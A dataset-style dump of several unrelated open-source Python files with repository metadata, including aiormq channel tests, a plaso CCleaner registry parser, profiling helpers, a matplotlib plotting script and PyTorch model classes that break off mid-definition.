self.out_h = open(self.out_h_filename, 'w')
self.out_c = open(self.out_c_filename, 'w')
self._codegen_start()
for node in self.namespace.values():
if isinstance(node, ast.Function):
with self._function(node):
body = self._function_bodies.get(node)
if not body:
body = ''
self.out_c.write(body)
self._codegen_end()
| 34.775281
| 85
| 0.593538
| 775
| 6,190
| 4.516129
| 0.243871
| 0.072
| 0.052571
| 0.063143
| 0.233714
| 0.203429
| 0.111714
| 0.086
| 0.086
| 0.056571
| 0
| 0.004761
| 0.287399
| 6,190
| 177
| 86
| 34.971751
| 0.78871
| 0.132795
| 0
| 0.070866
| 0
| 0
| 0.068063
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 1
| 0.094488
| false
| 0
| 0.023622
| 0
| 0.149606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138ba740eae4da2fa0a99d533446f723a2531106
| 1,522
|
py
|
Python
|
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
nimlime_core/utils/internal_tools.py
|
gmpreussner/Varriount.NimLime
|
33da0424248bf9360c2a7cbca4a22da7a8020785
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
:rtype: Callable
"""
@wraps(func)
def _profile_wrapper(*args, **kwargs):
global profiler_running
if not profiler_running:
profiler_running = True
try:
profiler.enable()
return func(*args, **kwargs)
finally:
profiler.disable()
profiler_running = False
return _profile_wrapper
def print_profile_data():
"""
Print the collected profile data.
"""
stream = StringIO()
statistics = Stats(profiler, stream=stream)
statistics.sort_stats('cumulative')
statistics.print_stats()
print(stream.getvalue())
| 20.849315
| 60
| 0.653088
| 171
| 1,522
| 5.690058
| 0.421053
| 0.077081
| 0.043165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000892
| 0.263469
| 1,522
| 72
| 61
| 21.138889
| 0.867083
| 0.211564
| 0
| 0.230769
| 0
| 0
| 0.035556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102564
| false
| 0
| 0.25641
| 0
| 0.410256
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138c6bcf0225f274dd1eb1c256462cdafdb949eb
| 2,524
|
py
|
Python
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | 4
|
2020-09-24T23:59:54.000Z
|
2020-09-27T16:43:37.000Z
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | 2
|
2021-03-06T19:55:34.000Z
|
2021-03-06T20:06:42.000Z
|
test/unit/test_monitor.py
|
dmvieira/driftage
|
830188aa341029cc2a643b2b3b50e625953a35eb
|
[
"Apache-2.0"
] | null | null | null |
import orjson
from asynctest import TestCase, Mock, patch
from freezegun import freeze_time
from driftage.monitor import Monitor
class TestMonitor(TestCase):
def setUp(self):
self.monitor = Monitor(
"user_test@local", "pass_test", "identif"
)
def tearDown(self):
self.monitor.container.stop()
def test_should_set_identifier_or_agent_name(self):
self.assertEqual(
self.monitor._identifier,
"identif"
)
monitor = Monitor(
"user_test2@local", "pass_test"
)
self.assertEqual(
monitor._identifier,
"user_test2"
)
monitor.container.stop()
@patch("driftage.monitor.WaitMonitorSubscriptions")
async def test_should_add_subscription_behaviour(self, behaviour_mock):
self.monitor.add_behaviour = Mock()
await self.monitor.setup()
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock()
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor.collect({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
@freeze_time("1989-08-12")
@patch("driftage.monitor.FastNotifyContacts")
@patch("driftage.monitor.Template")
def test_should_notify_contacts_on_new_data_with_call(
self, template_mock, behaviour_mock):
self.monitor.add_behaviour = Mock()
self.monitor({"my data": 1})
self.monitor.add_behaviour.assert_called_once_with(
behaviour_mock(),
template=template_mock.return_value
)
template_mock.assert_called_once_with(
body=str(orjson.dumps({
"data": {"my data": 1},
"metadata": {
"timestamp": 618883200.0,
"identifier": "identif"
}
}), "utf-8")
)
| 31.160494
| 75
| 0.587163
| 253
| 2,524
| 5.58498
| 0.268775
| 0.093418
| 0.059448
| 0.097665
| 0.619958
| 0.619958
| 0.619958
| 0.591649
| 0.591649
| 0.591649
| 0
| 0.025186
| 0.307845
| 2,524
| 80
| 76
| 31.55
| 0.783629
| 0
| 0
| 0.478873
| 0
| 0
| 0.1458
| 0.063788
| 0
| 0
| 0
| 0
| 0.098592
| 1
| 0.070423
| false
| 0.028169
| 0.056338
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138d56c884e89de3d6a25a794b256d4f746b9c4d
| 354
|
py
|
Python
|
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | 1
|
2022-03-27T20:30:45.000Z
|
2022-03-27T20:30:45.000Z
|
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | null | null | null |
examples/todo_advanced/main.py
|
travisluong/fastarg
|
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
|
[
"MIT"
] | null | null | null |
import fastarg
import commands.todo as todo
import commands.user as user
app = fastarg.Fastarg(description="productivity app", prog="todo")
@app.command()
def hello_world(name: str):
"""hello world"""
print("hello " + name)
app.add_fastarg(todo.app, name="todo")
app.add_fastarg(user.app, name="user")
if __name__ == "__main__":
app.run()
| 22.125
| 66
| 0.70339
| 51
| 354
| 4.666667
| 0.411765
| 0.088235
| 0.109244
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138418
| 354
| 16
| 67
| 22.125
| 0.780328
| 0.031073
| 0
| 0
| 0
| 0
| 0.12426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.363636
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138da1de200b7ec195fd8cfe7cb64a50fd1f3486
| 7,177
|
py
|
Python
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 176
|
2019-01-13T13:41:43.000Z
|
2022-03-26T04:01:03.000Z
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 79
|
2019-02-18T17:41:25.000Z
|
2022-02-25T11:09:33.000Z
|
tests/test_channel.py
|
rwilhelm/aiormq
|
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
|
[
"Apache-2.0"
] | 54
|
2019-02-19T09:53:12.000Z
|
2022-03-28T13:33:29.000Z
|
import asyncio
import uuid
import pytest
from aiomisc_pytest.pytest_plugin import TCPProxy
import aiormq
async def test_simple(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"foo",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b"foo"
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
async def test_blank_body(amqp_channel: aiormq.Channel):
await amqp_channel.basic_qos(prefetch_count=1)
assert amqp_channel.number
queue = asyncio.Queue()
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put)
await amqp_channel.basic_publish(
b"",
routing_key=deaclare_ok.queue,
properties=aiormq.spec.Basic.Properties(message_id="123"),
)
message = await queue.get() # type: DeliveredMessage
assert message.body == b""
cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag)
assert cancel_ok.consumer_tag == consume_ok.consumer_tag
assert cancel_ok.consumer_tag not in amqp_channel.consumers
await amqp_channel.queue_delete(deaclare_ok.queue)
deaclare_ok = await amqp_channel.queue_declare(auto_delete=True)
await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue)
message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True)
assert message.body == b"foo bar"
@pytest.mark.no_catch_loop_exceptions
async def test_bad_consumer(amqp_channel: aiormq.Channel, loop):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare()
future = loop.create_future()
await channel.basic_publish(b"urgent", routing_key=declare_ok.queue)
consumer_tag = loop.create_future()
async def bad_consumer(message):
await channel.basic_cancel(await consumer_tag)
future.set_result(message)
raise Exception
consume_ok = await channel.basic_consume(
declare_ok.queue, bad_consumer, no_ack=False,
)
consumer_tag.set_result(consume_ok.consumer_tag)
message = await future
await channel.basic_reject(message.delivery.delivery_tag, requeue=True)
assert message.body == b"urgent"
future = loop.create_future()
await channel.basic_consume(
declare_ok.queue, future.set_result, no_ack=True,
)
message = await future
assert message.body == b"urgent"
async def test_ack_nack_reject(amqp_channel: aiormq.Channel):
channel = amqp_channel # type: aiormq.Channel
await channel.basic_qos(prefetch_count=1)
declare_ok = await channel.queue_declare(auto_delete=True)
queue = asyncio.Queue()
await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False)
await channel.basic_publish(b"rejected", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"rejected"
await channel.basic_reject(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"nacked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"nacked"
await channel.basic_nack(message.delivery.delivery_tag, requeue=False)
await channel.basic_publish(b"acked", routing_key=declare_ok.queue)
message = await queue.get()
assert message.body == b"acked"
await channel.basic_ack(message.delivery.delivery_tag)
async def test_confirm_multiple(amqp_channel: aiormq.Channel):
"""
RabbitMQ has been observed to send confirmations in a strange pattern
when publishing simultaneously where only some messages are delivered
to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3).
This test is probably inconsequential without publisher_confirms
This is a regression for https://github.com/mosquito/aiormq/issues/10
"""
channel = amqp_channel # type: aiormq.Channel
exchange = uuid.uuid4().hex
await channel.exchange_declare(exchange, exchange_type="topic")
try:
declare_ok = await channel.queue_declare(exclusive=True)
await channel.queue_bind(
declare_ok.queue, exchange, routing_key="test.5",
)
for i in range(10):
messages = [
asyncio.ensure_future(channel.basic_publish(
b"test", exchange=exchange, routing_key="test.{}".format(i),
))
for i in range(10)
]
_, pending = await asyncio.wait(messages, timeout=0.2)
assert not pending, "not all publishes were completed (confirmed)"
await asyncio.sleep(0.05)
finally:
await channel.exchange_delete(exchange)
async def test_exclusive_queue_locked(amqp_connection):
channel0 = await amqp_connection.channel()
channel1 = await amqp_connection.channel()
qname = str(uuid.uuid4())
await channel0.queue_declare(qname, exclusive=True)
try:
await channel0.basic_consume(qname, print, exclusive=True)
with pytest.raises(aiormq.exceptions.ChannelLockedResource):
await channel1.queue_declare(qname)
await channel1.basic_consume(qname, print, exclusive=True)
finally:
await channel0.queue_delete(qname)
async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel):
with pytest.raises(aiormq.exceptions.ChannelClosed):
await amqp_channel.queue_declare(
"amq.forbidden_queue_name", auto_delete=True,
)
with pytest.raises(aiormq.exceptions.ChannelInvalidStateError):
await amqp_channel.queue_delete("amq.forbidden_queue_name")
async def test_proxy_connection(proxy_connection, proxy: TCPProxy):
channel = await proxy_connection.channel() # type: aiormq.Channel
await channel.queue_declare(auto_delete=True)
async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy):
for _ in range(3):
channel = await proxy_connection.channel() # type: aiormq.Channel
qname = str(uuid.uuid4())
with proxy.slowdown(read_delay=5, write_delay=0):
with pytest.raises(asyncio.TimeoutError):
await channel.queue_declare(
qname, auto_delete=True, timeout=0.5
)
| 34.671498
| 80
| 0.722029
| 937
| 7,177
| 5.297759
| 0.180363
| 0.073127
| 0.064464
| 0.050766
| 0.587429
| 0.53888
| 0.491338
| 0.445004
| 0.424456
| 0.408542
| 0
| 0.007229
| 0.19047
| 7,177
| 206
| 81
| 34.839806
| 0.84716
| 0.0209
| 0
| 0.401408
| 0
| 0
| 0.031631
| 0.00723
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0
| false
| 0
| 0.035211
| 0
| 0.035211
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138e485745a6d26b22140e7cd765e64928978552
| 455
|
py
|
Python
|
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | 1
|
2018-06-11T18:18:39.000Z
|
2018-06-11T18:18:39.000Z
|
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | null | null | null |
balanced_parens.py
|
joeghodsi/interview-questions
|
3e4eb76891245ce978cb9171e87d60e3b292b0a8
|
[
"Unlicense"
] | null | null | null |
'''
Problem description:
Given a string, determine whether or not the parentheses are balanced
'''
def balanced_parens(str):
'''
runtime: O(n)
space : O(1)
'''
if str is None:
return True
open_count = 0
for char in str:
if char == '(':
open_count += 1
elif char == ')':
open_count -= 1
if open_count < 0:
return False
return open_count == 0
| 17.5
| 69
| 0.514286
| 56
| 455
| 4.071429
| 0.607143
| 0.197368
| 0.131579
| 0.122807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021429
| 0.384615
| 455
| 25
| 70
| 18.2
| 0.792857
| 0.259341
| 0
| 0
| 0
| 0
| 0.006452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
138f08438e2c276d1577956212792c686c9d877c
| 6,333
|
py
|
Python
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 1,253
|
2015-01-02T13:58:02.000Z
|
2022-03-31T08:43:39.000Z
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 3,388
|
2015-01-02T11:17:58.000Z
|
2022-03-30T10:21:45.000Z
|
plaso/parsers/winreg_plugins/ccleaner.py
|
pyllyukko/plaso
|
7533db2d1035ca71d264d6281ebd5db2d073c587
|
[
"Apache-2.0"
] | 376
|
2015-01-20T07:04:54.000Z
|
2022-03-04T23:53:00.000Z
|
# -*- coding: utf-8 -*-
"""Parser for the CCleaner Registry key."""
import re
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import winreg_parser
from plaso.parsers.winreg_plugins import interface
class CCleanerConfigurationEventData(events.EventData):
"""CCleaner configuration event data.
Attributes:
configuration (str): CCleaner configuration.
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:configuration'
def __init__(self):
"""Initializes event data."""
super(CCleanerConfigurationEventData, self).__init__(
data_type=self.DATA_TYPE)
self.configuration = None
self.key_path = None
class CCleanerUpdateEventData(events.EventData):
"""CCleaner update event data.
Attributes:
key_path (str): Windows Registry key path.
"""
DATA_TYPE = 'ccleaner:update'
def __init__(self):
"""Initializes event data."""
super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE)
self.key_path = None
class CCleanerPlugin(interface.WindowsRegistryPlugin):
"""Gathers the CCleaner Keys for NTUSER hive.
Known Windows Registry values within the CCleaner key:
* (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned;
* (App)Delete Index.dat files [REG_SZ]
* (App)History [REG_SZ]
* (App)Last Download Location [REG_SZ]
* (App)Other Explorer MRUs [REG_SZ]
* (App)Recent Documents [REG_SZ]
* (App)Recently Typed URLs [REG_SZ]
* (App)Run (in Start Menu) [REG_SZ]
* (App)Temporary Internet Files [REG_SZ]
* (App)Thumbnail Cache [REG_SZ]
* CookiesToSave [REG_SZ]
* UpdateKey [REG_SZ], contains a date and time formatted as:
"MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM";
* WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels;
* WINDOW_LEFT [REG_SZ]
* WINDOW_MAX [REG_SZ]
* WINDOW_TOP [REG_SZ]
* WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels;
Also see:
http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html
"""
NAME = 'ccleaner'
DATA_FORMAT = 'CCleaner Registry data'
FILTERS = frozenset([
interface.WindowsRegistryKeyPathFilter(
'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')])
# Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M"
# for example "07/13/2013 10:03:14 AM"
# TODO: determine if this is true for other locales.
_UPDATE_DATE_TIME_RE = re.compile(
r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) '
r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)')
def _ParseUpdateKeyValue(self, parser_mediator, registry_value):
"""Parses the UpdateKey value.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_value (dfwinreg.WinRegistryValue): Windows Registry value.
Returns:
dfdatetime_time_elements.TimeElements: date and time value or None
if not available.
"""
if not registry_value.DataIsString():
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data type: {0:s}'.format(
registry_value.data_type_string))
return None
date_time_string = registry_value.GetDataAsObject()
if not date_time_string:
parser_mediator.ProduceExtractionWarning('missing UpdateKey value data')
return None
re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string)
if not re_match:
parser_mediator.ProduceExtractionWarning(
'unsupported UpdateKey value data: {0!s}'.format(date_time_string))
return None
month, day_of_month, year, hours, minutes, seconds, part_of_day = (
re_match.groups())
try:
year = int(year, 10)
month = int(month, 10)
day_of_month = int(day_of_month, 10)
hours = int(hours, 10)
minutes = int(minutes, 10)
seconds = int(seconds, 10)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(date_time_string))
return None
if part_of_day == 'PM':
hours += 12
time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds)
try:
date_time = dfdatetime_time_elements.TimeElements(
time_elements_tuple=time_elements_tuple)
date_time.is_local_time = True
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid UpdateKey date time value: {0!s}'.format(
time_elements_tuple))
return None
return date_time
def ExtractEvents(self, parser_mediator, registry_key, **kwargs):
"""Extracts events from a Windows Registry key.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
registry_key (dfwinreg.WinRegistryKey): Windows Registry key.
"""
configuration = []
date_time = None
for registry_value in registry_key.GetValues():
if not registry_value.name or not registry_value.data:
continue
if registry_value.name == 'UpdateKey':
date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value)
else:
value = registry_value.GetDataAsObject()
configuration.append('{0:s}: {1!s}'.format(registry_value.name, value))
if date_time:
event_data = CCleanerUpdateEventData()
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_UPDATE,
time_zone=parser_mediator.timezone)
parser_mediator.ProduceEventWithEventData(event, event_data)
event_data = CCleanerConfigurationEventData()
event_data.configuration = ' '.join(sorted(configuration)) or None
event_data.key_path = registry_key.path
event = time_events.DateTimeValuesEvent(
registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
| 33.331579
| 92
| 0.707879
| 794
| 6,333
| 5.437028
| 0.270781
| 0.01969
| 0.008339
| 0.011119
| 0.295112
| 0.276118
| 0.251564
| 0.203845
| 0.176048
| 0.176048
| 0
| 0.017015
| 0.192642
| 6,333
| 189
| 93
| 33.507937
| 0.827303
| 0.321017
| 0
| 0.223404
| 0
| 0.021277
| 0.102632
| 0.037431
| 0
| 0
| 0
| 0.005291
| 0
| 1
| 0.042553
| false
| 0
| 0.074468
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1395c34c642a4ba06cd80eeb8c512c19499d8a1b
| 1,707
|
py
|
Python
|
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | 3
|
2020-06-04T15:25:37.000Z
|
2020-06-06T05:09:07.000Z
|
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | null | null | null |
mine/src/main/python/SVM.py
|
nextzlog/mine
|
49ef0bea4796920d8696dc5f076f86c0ab17be80
|
[
"BSD-3-Clause"
] | null | null | null |
import os,sys
import webbrowser
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.cm as cm
import matplotlib.pylab as plt
from matplotlib import ticker
plt.rcParams['font.family'] = 'monospace'
fig = plt.figure()
rect = fig.add_subplot(111, aspect='equal')
data0 = np.loadtxt('data0.dat', delimiter=',')
data1 = np.loadtxt('data1.dat', delimiter=',')
dense = np.loadtxt('dense.dat', delimiter=',')
ID = sys.argv[1]
X = np.arange(-2.0, 2.05, 0.05)
Y = np.arange(-2.0, 2.05, 0.05)
Xm, Ym = np.meshgrid(X, Y)
vmin, vmax = dense.min(), dense.max()
if vmin * vmax < 0:
vmin = -abs(max(-vmin, vmax))
vmax = +abs(max(-vmin, vmax))
cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower')
plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2])
plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2])
cb = plt.colorbar(cr, format='%+.1e')
cb.solids.set_edgecolor('face')
cb.set_ticks(ticker.LinearLocator(6))
cb.ax.tick_params(labelsize=12)
rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1)
rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1)
plt.xlim(X[0], X[-1])
plt.ylim(Y[0], Y[-1])
plt.xlabel("")
plt.ylabel("")
plt.grid(ls='dotted')
plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1)
plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1)
os.remove('dense.dat')
os.remove('data0.dat')
os.remove('data1.dat')
webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
| 38.795455
| 140
| 0.671353
| 287
| 1,707
| 3.965157
| 0.390244
| 0.035149
| 0.01406
| 0.017575
| 0.16696
| 0.16696
| 0.087873
| 0.087873
| 0.059754
| 0
| 0
| 0.041131
| 0.088459
| 1,707
| 43
| 141
| 39.697674
| 0.690231
| 0
| 0
| 0
| 0
| 0
| 0.104277
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13980d70f605aa90e6f0d5a0697ef90a4b646aec
| 4,708
|
py
|
Python
|
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | null | null | null |
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | 9
|
2021-11-10T20:16:41.000Z
|
2022-03-12T00:59:05.000Z
|
task_templates/pipelines/python3_pytorch_regression/model_utils.py
|
andreakropp/datarobot-user-models
|
423ab8c703a545491ad6013a0b7efa3119e2c0fc
|
[
"Apache-2.0"
] | 1
|
2021-06-17T22:05:33.000Z
|
2021-06-17T22:05:33.000Z
|
#!/usr/bin/env python
# coding: utf-8
# pylint: disable-all
from __future__ import absolute_import
from sklearn.preprocessing import LabelEncoder
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
class BinModel(nn.Module):
expected_target_type = torch.FloatTensor
def __init__(self, input_size):
super(BinModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
self.out_act = nn.Sigmoid()
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
a3 = self.out(h2)
y = self.out_act(a3)
return y
class RegModel(nn.Module):
def __init__(self, input_size):
super(RegModel, self).__init__()
self.fc1 = nn.Linear(input_size, 50)
self.relu1 = nn.ReLU()
self.dout = nn.Dropout(0.2)
self.fc2 = nn.Linear(50, 100)
self.prelu = nn.PReLU(1)
self.out = nn.Linear(100, 1)
def forward(self, input_):
a1 = self.fc1(input_)
h1 = self.relu1(a1)
dout = self.dout(h1)
a2 = self.fc2(dout)
h2 = self.prelu(a2)
y = self.out(h2)
return y
class MultiModel(nn.Module):
expected_target_type = torch.LongTensor
def __init__(self, input_size, output_size):
super(MultiModel, self).__init__()
self.layer1 = nn.Linear(input_size, 8)
self.relu = nn.ReLU()
